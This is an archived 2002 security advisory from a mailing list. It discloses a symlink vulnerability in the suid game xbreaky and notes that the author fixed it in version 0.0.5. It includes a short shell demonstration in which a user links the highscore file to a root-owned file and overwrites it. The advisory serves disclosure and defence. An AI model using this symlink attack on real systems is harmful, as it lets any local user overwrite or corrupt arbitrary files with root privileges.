Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Marco van Berkum (m.v.berkum_at_obit.nl)
Date: Thu Sep 12 2002 - 11:28:14 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Title: xbreaky symlink vulnerability
    Author: Marco van Berkum
    Classification: High risk
    Date: 12/09/2002
    Email: m.v.berkumobit.nl
    Company: OBIT
    Company site: http://www.obit.nl
    Personal website: http://ws.obit.nl

    About xbreaky
    xbreaky is a breakout game for X written by Dave Brul which can be downloaded
    from http://xbreaky.sourceforge.net. xbreaky is added to the OpenBSD ports tree,
    NetBSD tree and possibly others.

    By default xbreaky is installed as suid and can be abused to overwrite any file
    on the filesystem, by any user.

    Vulnerable versions
    All versions prior to 0.0.5

    xbreaky uses $HOME/.breakyhighscores to write the highscores to, when
    $HOME/.breakyhighscores is symlinked to another file (*any* file) it simply
    overwrites it as root user.

    rootanimal:/home/marco# echo "bla" >rootfile
    rootanimal:/home/marco# chmod 600 rootfile
    rootanimal:/home/marco# exit
    marcoanimal:~$ ln -s rootfile .breakyhighscores
    marcoanimal:~$ xbreaky

    Now I play a game and set highscore as user "lol", then I exit the game.
    Its a nice game btw :)

    marcoanimal:~$ cat rootfile
    cat: rootfile: Permission denied
    marcoanimal:~$ su -
    rootanimal:~# cat /home/marco/rootfile
    lol <- voila, our highscore user

    Author's response and solution
    The author corrected the problem and released xbreaky 0.0.5

    Thanks to Dennis Oelkers for testing.

    find / -user your -name base -exec chown us:us {}\;
    |    Marco van Berkum / MB17300-RIPE     |
    | m.v.berkumobit.nl / http://ws.obit.nl |